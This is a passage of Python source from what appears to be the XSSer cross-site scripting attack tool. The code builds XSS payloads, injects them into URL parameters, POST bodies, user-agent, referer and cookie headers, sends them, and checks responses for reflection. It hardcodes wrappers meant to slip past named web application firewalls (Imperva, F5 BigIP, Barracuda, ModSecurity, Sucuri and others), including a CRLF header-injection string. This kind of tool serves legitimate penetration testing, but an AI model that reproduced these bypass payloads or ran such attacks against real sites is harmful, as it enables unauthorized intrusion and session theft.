  591. def get_url_payload(self, url, payload, query_string, user_attack_payload):
  592. """
  593. Attack the given url within the given payload
  594. """
  595. options = self.options
  596. self._ongoing_attacks = {}
  597. if (self.options.xsa or self.options.xsr or self.options.coo):
  598. agent, referer, cookie = self._prepare_extra_attacks(payload)
  599. else:
  600. agents = [] # user-agents
  601. try:
  602. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  603. except:
  604. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  605. for line in f:
  606. agents.append(line)
  607. agent = random.choice(agents).strip() # set random user-agent
  608. referer = "127.0.0.1"
  609. cookie = None
  610. if options.agent:
  611. agent = options.agent
  612. else:
  613. self.options.agent = agent
  614. if options.referer:
  615. referer = options.referer
  616. else:
  617. self.options.referer = referer
  618. if options.cookie: # set formatted by user cookies
  619. cookie = options.cookie
  620. else:
  621. self.options.cookie = cookie
  622. # get payload/vector
  623. payload_string = payload['payload'].strip()
  624. ### Anti-antiXSS exploits
  625. # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
  626. if options.phpids065:
  627. payload_string = 32*payload_string + payload_string
  628. # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016)
  629. if options.phpids070:
  630. payload_string = '<svg+onload=+"'+payload_string+'">'
  631. # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016
  632. if options.imperva:
  633. payload_string = '<img src=x onerror="'+payload_string+'">'
  634. # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016
  635. if options.webknight:
  636. payload_string = '<details ontoggle='+payload_string+'>'
  637. # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016
  638. if options.f5bigip:
  639. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
  640. # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016
  641. if options.barracuda:
  642. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
  643. # Apache / modsec [ALL] payload: special 18/02/2016
  644. if options.modsec:
  645. payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
  646. # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016
  647. if options.quickdefense:
  648. payload_string = '<details ontoggle="'+payload_string+'">'
  649. # SucuriWAF [ALL] payload: 'ontoggle' + payload[Unicode] 18/02/2016
  650. if options.sucuri:
  651. payload_string = '<a+id="a"href=javascript%26colon;alert%26lpar;'+payload_string+'%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Y</a>'
  652. # Firefox 12 (and below) # 09/2019
  653. if options.firefox:
  654. payload_string = "<script type ='text/javascript'>"+payload_string+"</script>"
  655. # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019
  656. if options.chrome:
  657. payload_string = "<script>/*///*/"+payload_string+"</script>"
  658. # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019
  659. if options.iexplorer:
  660. payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>'+payload_string+'</script></body></html>'
  661. # Opera 10.6 (but also IE6) # 09/2019
  662. if options.opera:
  663. payload_string = "<Table background = javascript: alert ("+payload_string+")> </ table>"
  664. # Substitute the attacking hash
  665. if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
  666. payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
  667. payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
  668. hashed_payload = payload_string
  669. # Imperva
  670. if options.imperva:
  671. hashed_payload = urllib.parse.urlencode({'':hashed_payload})
  672. hashed_payload = urllib.parse.urlencode({'':hashed_payload}) #DoubleURL encoding
  673. hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
  674. hashed_payload = str(hashed_payload) # + Unicode
  675. # Quick Defense
  676. if options.quickdefense:
  677. hashed_payload = str(hashed_payload) # + Unicode
  678. # apply user final attack url payload
  679. if user_attack_payload:
  680. hashed_vector_url = self.encoding_permutations(user_attack_payload)
  681. else:
  682. hashed_vector_url = self.encoding_permutations(hashed_payload)
  683. # replace special payload string also for extra attacks
  684. if self.extra_hashed_injections:
  685. hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD')
  686. for k, v in self.extra_hashed_injections.items():
  687. if v[1] in hashed_payload:
  688. self.extra_hashed_vector_url[k] = v[0], hashed_payload
  689. self.extra_hashed_injections = self.extra_hashed_vector_url
  690. if not options.getdata: # using GET as a single input (-u)
  691. target_url = url
  692. else:
  693. if not url.endswith("/") and not options.getdata.startswith("/"):
  694. url = url + "/"
  695. target_url = url + options.getdata
  696. p_uri = urlparse(target_url)
  697. uri = p_uri.netloc
  698. path = p_uri.path
  699. if not uri.endswith('/') and not path.startswith('/'):
  700. uri = uri + "/"
  701. if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword
  702. if not "XSS" in target_url:
  703. if not target_url.endswith("/"):
  704. target_url = target_url + "/XSS"
  705. else:
  706. target_url = target_url + "XSS"
  707. target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
  708. if self.options.script:
  709. if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params
  710. self.not_keyword_exit()
  711. if not target_params and not options.postdata:
  712. if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads
  713. if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found!
  714. self.not_keyword_exit()
  715. else: # keyword found at target url (ex: https://target.com/XSS)
  716. if 'XSS' in target_url:
  717. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  718. elif 'X1S' in target_url:
  719. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  720. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  721. if "[B64]" in hashed_payload: # [DCP Injection]
  722. dcp_payload = hashed_payload.split("[B64]")[1]
  723. dcp_preload = hashed_payload.split("[B64]")[0]
  724. dcp_payload = b64encode(dcp_payload)
  725. hashed_payload = dcp_preload + dcp_payload
  726. self.hashed_injections[url_orig_hash] = target_url
  727. if user_attack_payload:
  728. pass
  729. else:
  730. hashed_vector_url = self.encoding_permutations(hashed_payload)
  731. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
  732. target_url_params = urllib.parse.urlencode(target_params)
  733. if not uri.endswith('/') and not path.startswith('/'):
  734. uri = uri + "/"
  735. dest_url = p_uri.scheme + "://" + uri + path
  736. if not "XSS" in dest_url:
  737. if not dest_url.endswith("/"):
  738. dest_url = dest_url + "/" + hashed_vector_url
  739. else:
  740. dest_url = dest_url + hashed_vector_url
  741. else:
  742. if 'XSS' in dest_url:
  743. dest_url = dest_url.replace('XSS', hashed_vector_url)
  744. if 'X1S' in dest_url:
  745. dest_url = dest_url.replace('X1S', hashed_vector_url)
  746. else:
  747. if 'XSS' in target_url:
  748. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  749. elif 'X1S' in target_url:
  750. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  751. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  752. if "[B64]" in hashed_payload: # [DCP Injection]
  753. dcp_payload = hashed_payload.split("[B64]")[1]
  754. dcp_preload = hashed_payload.split("[B64]")[0]
  755. dcp_payload = b64encode(dcp_payload)
  756. hashed_payload = dcp_preload + dcp_payload
  757. self.hashed_injections[url_orig_hash] = target_url
  758. if user_attack_payload:
  759. pass
  760. else:
  761. hashed_vector_url = self.encoding_permutations(hashed_payload)
  762. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
  763. target_url_params = urllib.parse.urlencode(target_params)
  764. if not uri.endswith('/') and not path.startswith('/'):
  765. uri = uri + "/"
  766. dest_url = p_uri.scheme + "://" + uri + path
  767. if 'XSS' in dest_url:
  768. dest_url = dest_url.replace('XSS', hashed_vector_url)
  769. if 'X1S' in dest_url:
  770. dest_url = dest_url.replace('X1S', hashed_vector_url)
  771. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  772. else:
  773. if not options.postdata:
  774. r = 0
  775. for key, value in target_params.items(): # parse params searching for keywords
  776. for v in value:
  777. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
  778. if v == 'XSS':
  779. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  780. elif v == 'X1S':
  781. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  782. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  783. if "[B64]" in hashed_payload: # [DCP Injection]
  784. dcp_payload = hashed_payload.split("[B64]")[1]
  785. dcp_preload = hashed_payload.split("[B64]")[0]
  786. dcp_payload = b64encode(dcp_payload)
  787. hashed_payload = dcp_preload + dcp_payload
  788. self.hashed_injections[url_orig_hash] = key
  789. if user_attack_payload:
  790. pass
  791. else:
  792. hashed_vector_url = self.encoding_permutations(hashed_payload)
  793. target_params[key] = hashed_vector_url
  794. r = r + 1
  795. else:
  796. if self.options.xsa or self.options.xsr or self.options.coo:
  797. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  798. self.hashed_injections[url_orig_hash] = key
  799. target_params[key] = v
  800. r = r + 1
  801. else:
  802. target_params[key] = v
  803. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
  804. self.not_keyword_exit()
  805. payload_url = query_string.strip() + hashed_vector_url
  806. target_url_params = urllib.parse.urlencode(target_params)
  807. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  808. else: # using POST provided by parameter (-p)
  809. target_params = parse_qs(query_string, keep_blank_values=True)
  810. r = 0
  811. for key, value in target_params.items(): # parse params searching for keywords
  812. for v in value:
  813. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
  814. if v == 'XSS':
  815. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  816. elif v == 'X1S':
  817. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  818. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  819. if "[B64]" in hashed_payload: # [DCP Injection]
  820. dcp_payload = hashed_payload.split("[B64]")[1]
  821. dcp_preload = hashed_payload.split("[B64]")[0]
  822. dcp_payload = b64encode(dcp_payload)
  823. hashed_payload = dcp_preload + dcp_payload
  824. self.hashed_injections[url_orig_hash] = key
  825. if user_attack_payload:
  826. pass
  827. else:
  828. hashed_vector_url = self.encoding_permutations(hashed_payload)
  829. target_params[key] = hashed_vector_url
  830. r = r + 1
  831. else:
  832. if self.options.xsa or self.options.xsr or self.options.coo:
  833. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  834. self.hashed_injections[url_orig_hash] = key
  835. target_params[key] = v
  836. r = r + 1
  837. else:
  838. target_params[key] = v
  839. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
  840. self.not_keyword_exit()
  841. target_url_params = urllib.parse.urlencode(target_params)
  842. dest_url = target_url_params
  843. self._ongoing_attacks['url'] = url_orig_hash
  844. if payload['browser'] == "[Document Object Model Injection]": # url decoding/unquote DOM payloads to execute url #fragments
  845. dest_url = urllib.parse.unquote(dest_url)
  846. return dest_url, agent, referer, cookie
  847. def attack_url_payload(self, url, payload, query_string):
  848. if not self.pool:
  849. pool = self.mothership.pool
  850. else:
  851. pool = self.pool
  852. c = Curl()
  853. if self.options.getdata or not self.options.postdata:
  854. dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None)
  855. def _cb(request, result):
  856. self.finish_attack_url_payload(c, request, result, payload,
  857. query_string, url, dest_url)
  858. _error_cb = self.error_attack_url_payload
  859. def _error_cb(request, error):
  860. self.error_attack_url_payload(c, url, request, error)
  861. c.agent = agent
  862. c.referer = referer
  863. c.cookie = cookie
  864. if " " in dest_url: # parse blank spaces
  865. dest_url = dest_url.replace(" ", "+")
  866. pool.addRequest(c.get, [[dest_url]], _cb, _error_cb)
  867. self._ongoing_requests += 1
  868. if self.options.postdata:
  869. dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None)
  870. def _cb(request, result):
  871. self.finish_attack_url_payload(c, request, result, payload,
  872. query_string, url, dest_url)
  873. _error_cb = self.error_attack_url_payload
  874. def _error_cb(request, error):
  875. self.error_attack_url_payload(c, url, request, error)
  876. dest_url = dest_url.strip().replace("/", "", 1)
  877. c.agent = agent
  878. c.referer = referer
  879. c.cookie = cookie
  880. pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb)
  881. self._ongoing_requests += 1
  882. def error_attack_url_payload(self, c, url, request, error):
  883. self._ongoing_requests -= 1
  884. for reporter in self._reporters:
  885. reporter.mosquito_crashed(url, str(error[0]))
  886. dest_url = request.args[0]
  887. self.report("[Error] Failed attempt (URL Malformed!?): " + url + "\n")
  888. self.urlmalformed = True
  889. if self.urlmalformed == True and self.urlspoll[0] == url:
  890. self.land()
  891. if DEBUG == True:
  892. self.report(str(error[0]))
  893. traceback.print_tb(error[2])
  894. c.close()
  895. del c
  896. return
  897. def finish_attack_url_payload(self, c, request, result, payload,
  898. query_string, url, dest_url):
  899. self.round_complete = self.round_complete + 1
  900. self.report("="*75)
  901. self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time))
  902. self.report("="*75)
  903. self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n")
  904. self._ongoing_requests -= 1
  905. # adding constant head check number flag
  906. if self.options.isalive:
  907. self.flag_isalive_num = int(self.options.isalive)
  908. if not self.options.isalive:
  909. pass
  910. elif self.options.isalive and not self.options.nohead:
  911. self.errors_isalive = self.errors_isalive + 1
  912. if self.errors_isalive > self.options.isalive:
  913. pass
  914. else:
  915. self.report("---------------------")
  916. self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
  917. if self.next_isalive == True:
  918. hc = Curl()
  919. self.next_isalive = False
  920. try:
  921. urls = hc.do_head_check([url])
  922. except:
  923. print("[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
  924. self.errors_isalive = 0
  925. return
  926. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
  927. print("HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n")
  928. print("- Your target still Alive: " + "(" + url + ")")
  929. print("- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n")
  930. print(" - your injections are failing: normal :-)")
  931. print(" - maybe exists some IPS/NIDS/... systems blocking your requests!\n")
  932. else:
  933. if str(hc.info()["http-code"]) == "0":
  934. print("\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
  935. else:
  936. print("HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n")
  937. print("- Your target " + "(" + url + ")" + " looks that is NOT alive")
  938. print("- If you are receiving continuous 404 errors requests on payloads\n and this HEAD pre-check request is giving you another 404\n maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n")
  939. self.errors_isalive = 0
  940. else:
  941. if str(self.errors_isalive) >= str(self.options.isalive):
  942. self.report("---------------------")
  943. self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
  944. self.next_isalive = True
  945. self.options.isalive = self.flag_isalive_num
  946. else:
  947. if self.options.isalive and self.options.nohead:
  948. self.report("---------------------")
  949. self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
  950. self.report("---------------------")
  951. # check results an alternative url, choosing method and parameters, or not
  952. if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
  953. self.options.altm = "GET"
  954. if self.options.altm == "post":
  955. self.options.altm = "POST"
  956. if self.options.alt == None:
  957. pass
  958. else:
  959. self.report("="*45)
  960. self.report("[+] Checking Response Options:", "\n")
  961. self.report("[+] Url:", self.options.alt)
  962. self.report("[-] Method:", self.options.altm)
  963. if self.options.ald:
  964. self.report("[-] Parameter(s):", self.options.ald, "\n")
  965. else:
  966. self.report("[-] Parameter(s):", query_string, "\n")
  967. if c.info()["http-code"] in ["200", "302", "301"]:
  968. if self.options.statistics:
  969. self.success_connection = self.success_connection + 1
  970. self._report_attack_success(c, dest_url, payload,
  971. query_string, url)
  972. else:
  973. self._report_attack_failure(c, dest_url, payload,
  974. query_string, url)
  975. # checking response results
  976. if self.options.alt == None:
  977. pass
  978. else:
  979. self.report("="*45)
  980. self.report("[+] Checking Response Results:", "\n")
  981. self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
  982. if 'PAYLOAD' in payload['payload']:
  983. user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
  984. if self.options.ald:
  985. query_string = self.options.ald
  986. if "VECTOR" in self.options.alt:
  987. dest_url = self.options.alt
  988. else:
  989. if not dest_url.endswith("/"):
  990. dest_url = dest_url + "/"
  991. if self.options.altm == 'POST':
  992. dest_url = "" + query_string + user_attack_payload
  993. dest_url = dest_url.strip().replace("/", "", 1)
  994. data = c.post(url, dest_url)
  995. else:
  996. dest_url = self.options.alt + query_string + user_attack_payload
  997. c.get(dest_url)
  998. # perform check response injection
  999. if c.info()["http-code"] in ["200", "302", "301"]:
  1000. if self.options.statistics:
  1001. self.success_connection = self.success_connection + 1
  1002. self._report_attack_success(c, dest_url, payload,
  1003. query_string, url)
  1004. else:
  1005. self._report_attack_failure(c, dest_url, payload,
  1006. query_string, url)
  1007. c.close()
  1008. del c
  1009. def encoding_permutations(self, enpayload_url):
  1010. """
  1011. perform encoding permutations on the url and query_string.
  1012. """
  1013. options = self.options
  1014. if options.Cem:
  1015. enc_perm = options.Cem.split(",")
  1016. for _enc in enc_perm:
  1017. enpayload_url = self.encmap[_enc](enpayload_url)
  1018. else:
  1019. for enctype in list(self.encmap.keys()):
  1020. if getattr(options, enctype):
  1021. enpayload_url = self.encmap[enctype](enpayload_url)
  1022. return enpayload_url
  1023. def _report_attack_success(self, curl_handle, dest_url, payload,\
  1024. query_string, orig_url):
  1025. """
  1026. report connection success when attacking
  1027. """
  1028. if not orig_url in self.successful_urls:
  1029. self.successful_urls.append(orig_url)
  1030. options = self.options
  1031. current_hashes = [] # to check for ongoing hashes
  1032. if payload['browser'] == "[Heuristic test]":
  1033. for key, value in self.hashed_injections.items():
  1034. if str(key) in dest_url:
  1035. if key not in current_hashes:
  1036. self.final_hashes[key] = value
  1037. current_hashes.append(key)
  1038. elif self.options.hash:
  1039. for key, value in self.hashed_injections.items():
  1040. self.final_hashes[key] = value
  1041. current_hashes.append(key)
  1042. else:
  1043. self.report("-"*45)
  1044. self.report("\n[!] Hashing: \n")
  1045. for key, value in self.hashed_injections.items():
  1046. if str(key) in dest_url:
  1047. if key not in current_hashes:
  1048. self.report(" [ " +key+" ] : [" , value + " ]")
  1049. self.final_hashes[key] = value
  1050. current_hashes.append(key)
  1051. else:
  1052. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1053. b64_string = payload["payload"].split("[B64]")
  1054. b64_string = b64_string[1]
  1055. b64_string = b64_string.replace('PAYLOAD', key)
  1056. b64_string = b64encode(b64_string)
  1057. b64_string = urllib.parse.urlencode({'':b64_string})
  1058. if b64_string.startswith("="):
  1059. b64_string = b64_string.replace("=", "")
  1060. if str(b64_string) in str(dest_url):
  1061. if key not in current_hashes:
  1062. self.report(" [ " +key+" ] : [" , value + " ]")
  1063. self.final_hashes[key] = value
  1064. current_hashes.append(key)
  1065. else: # when using encoders (Str, Hex, Dec...)
  1066. payload_string = payload["payload"].replace("PAYLOAD", key)
  1067. hashed_payload = self.encoding_permutations(payload_string)
  1068. if self.options.Cem:
  1069. enc_perm = options.Cem.split(",")
  1070. for e in enc_perm:
  1071. hashed_payload = self.encoding_permutations(payload_string)
  1072. if e == "Str":
  1073. hashed_payload = hashed_payload.replace(",", "%2C")
  1074. if e == "Mix":
  1075. hashed_payload=urllib.parse.quote(hashed_payload)
  1076. if e == "Dec":
  1077. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1078. if e == "Hex":
  1079. hashed_payload = hashed_payload.replace("%", "%25")
  1080. if e == "Hes":
  1081. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1082. hashed_payload = hashed_payload.replace(";", "%3B")
  1083. else:
  1084. if self.options.Str:
  1085. hashed_payload = hashed_payload.replace(",", "%2C")
  1086. if self.options.Mix:
  1087. hashed_payload=urllib.parse.quote(hashed_payload)
  1088. if self.options.Dec:
  1089. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1090. if self.options.Hex:
  1091. hashed_payload = hashed_payload.replace("%", "%25")
  1092. if self.options.Hes:
  1093. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1094. hashed_payload = hashed_payload.replace(";", "%3B")
  1095. if str(hashed_payload) in str(dest_url):
  1096. if key not in current_hashes:
  1097. self.report(" [ " +key+" ] : [" , value + " ]")
  1098. self.final_hashes[key] = value
  1099. if self.extra_hashed_injections:
  1100. for k, v in self.extra_hashed_injections.items():
  1101. payload_url = str(v[1])
  1102. if payload_url == payload["payload"]:
  1103. if k not in current_hashes:
  1104. self.report(" [ " +k+" ] : [" , v[0] + " ]")
  1105. self.final_hashes[k] = v[0]
  1106. current_hashes.append(k)
  1107. self.report("\n"+"-"*45+"\n")
  1108. if payload['browser'] == "[Heuristic test]":
  1109. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
  1110. else:
  1111. if self.extra_hashed_injections:
  1112. extra_attacks=[]
  1113. if options.xsa:
  1114. extra_attacks.append("XSA")
  1115. if options.xsr:
  1116. extra_attacks.append("XSR")
  1117. if options.coo:
  1118. extra_attacks.append("COO")
  1119. if extra_attacks:
  1120. extra_attacks = "+ "+ str(extra_attacks)
  1121. if options.postdata:
  1122. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
  1123. else:
  1124. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
  1125. else:
  1126. if options.postdata:
  1127. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
  1128. else:
  1129. self.report("[*] Trying: \n\n" + dest_url.strip() + "\n")
  1130. if not self.options.hash and not self.options.script:
  1131. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
  1132. pass
  1133. else:
  1134. self.report("-"*45)
  1135. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
  1136. pass
  1137. else:
  1138. if not "XSS" in dest_url or not "X1S" in dest_url:
  1139. if self.options.xsa or self.options.xsr or self.options.coo:
  1140. pass
  1141. else:
  1142. self.report("-"*45)
  1143. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1144. if not self.options.verbose:
  1145. self.report("-"*45 + "\n")
  1146. else:
  1147. self.report("-"*45)
  1148. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1149. if not self.options.verbose:
  1150. self.report("-"*45 + "\n")
  1151. # statistics injections counters
  1152. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
  1153. self.check_positives = self.check_positives + 1
  1154. elif payload['browser']=="[Data Control Protocol Injection]":
  1155. self.dcp_injection = self.dcp_injection + 1
  1156. elif payload['browser']=="[Document Object Model Injection]":
  1157. self.dom_injection = self.dom_injection + 1
  1158. elif payload['browser']=="[Induced Injection]":
  1159. self.httpsr_injection = self.httpsr_injection + 1
  1160. elif payload['browser']=="[manual_injection]":
  1161. self.manual_injection = self.manual_injection + 1
  1162. else:
  1163. self.auto_injection = self.auto_injection +1
  1164. if not self.hashed_injections:
  1165. for k, v in self.extra_hashed_injections.items():
  1166. if k in current_hashes:
  1167. if v[0] == "XSA":
  1168. agent = v[1]
  1169. agent = agent.replace("PAYLOAD", k)
  1170. Curl.agent = agent
  1171. if v[0] == "XSR":
  1172. referer = v[1]
  1173. referer = referer.replace("PAYLOAD", k)
  1174. Curl.referer = referer
  1175. if v[0] == "COO":
  1176. cookie = v[1]
  1177. cookie = cookie.replace("PAYLOAD", k)
  1178. Curl.cookie = cookie
  1179. else:
  1180. for key, value in self.hashed_injections.items():
  1181. for k, v in self.extra_hashed_injections.items():
  1182. payload_url = v[1]
  1183. payload_url = payload_url.replace("PAYLOAD",key)
  1184. payload_url = payload_url.replace(" ", "+") # black magic!
  1185. final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
  1186. if payload_url in final_dest_url:
  1187. if v[0] == "XSA":
  1188. agent = v[1]
  1189. agent = agent.replace("PAYLOAD", k)
  1190. Curl.agent = agent
  1191. if v[0] == "XSR":
  1192. referer = v[1]
  1193. referer = referer.replace("PAYLOAD", k)
  1194. Curl.referer = referer
  1195. if v[0] == "COO":
  1196. cookie = v[1]
  1197. cookie = cookie.replace("PAYLOAD", k)
  1198. Curl.cookie = cookie
  1199. else:
  1200. if k in current_hashes:
  1201. if v[0] == "XSA":
  1202. agent = v[1]
  1203. agent = agent.replace("PAYLOAD", k)
  1204. Curl.agent = agent
  1205. if v[0] == "XSR":
  1206. referer = v[1]
  1207. referer = referer.replace("PAYLOAD", k)
  1208. Curl.referer = referer
  1209. if v[0] == "COO":
  1210. cookie = v[1]
  1211. cookie = cookie.replace("PAYLOAD", k)
  1212. Curl.cookie = cookie
  1213. if options.verbose:
  1214. self.report("-"*45)
  1215. self.report("\n[+] HTTP Headers Verbose:\n")
  1216. self.report(" [Client Request]")
  1217. Curl.print_options()
  1218. self.report(" [Server Reply]\n")
  1219. self.report(curl_handle.info())
  1220. self.report("="*45)
  1221. self.report("[*] Injection(s) Results:")
  1222. self.report("="*45 + "\n")
  1223. if payload['browser']=="[Heuristic test]":
  1224. for key, value in self.final_hashes.items():
  1225. if str(key) in dest_url:
  1226. heuristic_string = key
  1227. heuristic_param = str(payload['payload']).strip('XSS')
  1228. # checking heuristic responses
  1229. if heuristic_string in curl_handle.body():
  1230. # ascii
  1231. if heuristic_param == "\\":
  1232. self.heuris_backslash_found = self.heuris_backslash_found + 1
  1233. # / same as ASCII and Unicode
  1234. elif heuristic_param == "/":
  1235. self.heuris_slash_found = self.heuris_slash_found + 1
  1236. self.heuris_une_slash_found = self.heuris_une_slash_found + 1
  1237. elif heuristic_param == ">":
  1238. self.heuris_mayor_found = self.heuris_mayor_found + 1
  1239. elif heuristic_param == "<":
  1240. self.heuris_minor_found = self.heuris_minor_found + 1
  1241. elif heuristic_param == ";":
  1242. self.heuris_semicolon_found = self.heuris_semicolon_found + 1
  1243. elif heuristic_param == "'":
  1244. self.heuris_colon_found = self.heuris_colon_found + 1
  1245. elif heuristic_param == '"':
  1246. self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
  1247. elif heuristic_param == "=":
  1248. self.heuris_equal_found = self.heuris_equal_found + 1
  1249. # une
  1250. elif heuristic_param == "%5C":
  1251. self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
  1252. elif heuristic_param == "%3E":
  1253. self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
  1254. elif heuristic_param == "%3C":
  1255. self.heuris_une_minor_found = self.heuris_une_minor_found + 1
  1256. elif heuristic_param == "%3B":
  1257. self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
  1258. elif heuristic_param == "%27":
  1259. self.heuris_une_colon_found = self.heuris_une_colon_found + 1
  1260. elif heuristic_param == "%22":
  1261. self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
  1262. elif heuristic_param == "%3D":
  1263. self.heuris_une_equal_found = self.heuris_une_equal_found + 1
  1264. # dec
  1265. elif heuristic_param == "&#92":
  1266. self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
  1267. elif heuristic_param == "&#47":
  1268. self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
  1269. elif heuristic_param == "&#62":
  1270. self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
  1271. elif heuristic_param == "&#60":
  1272. self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
  1273. elif heuristic_param == "&#59":
  1274. self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
  1275. elif heuristic_param == "&#39":
  1276. self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
  1277. elif heuristic_param == "&#34":
  1278. self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
  1279. elif heuristic_param == "&#61":
  1280. self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1
  1281. self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success!
  1282. else:
  1283. if heuristic_param == "\\":
  1284. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
  1285. elif heuristic_param == "/":
  1286. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
  1287. elif heuristic_param == ">":
  1288. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
  1289. elif heuristic_param == "<":
  1290. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
  1291. elif heuristic_param == ";":
  1292. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
  1293. elif heuristic_param == "'":
  1294. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
  1295. elif heuristic_param == '"':
  1296. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
  1297. elif heuristic_param == "=":
  1298. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
  1299. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
  1300. elif self.options.hash:
  1301. for key, value in self.final_hashes.items():
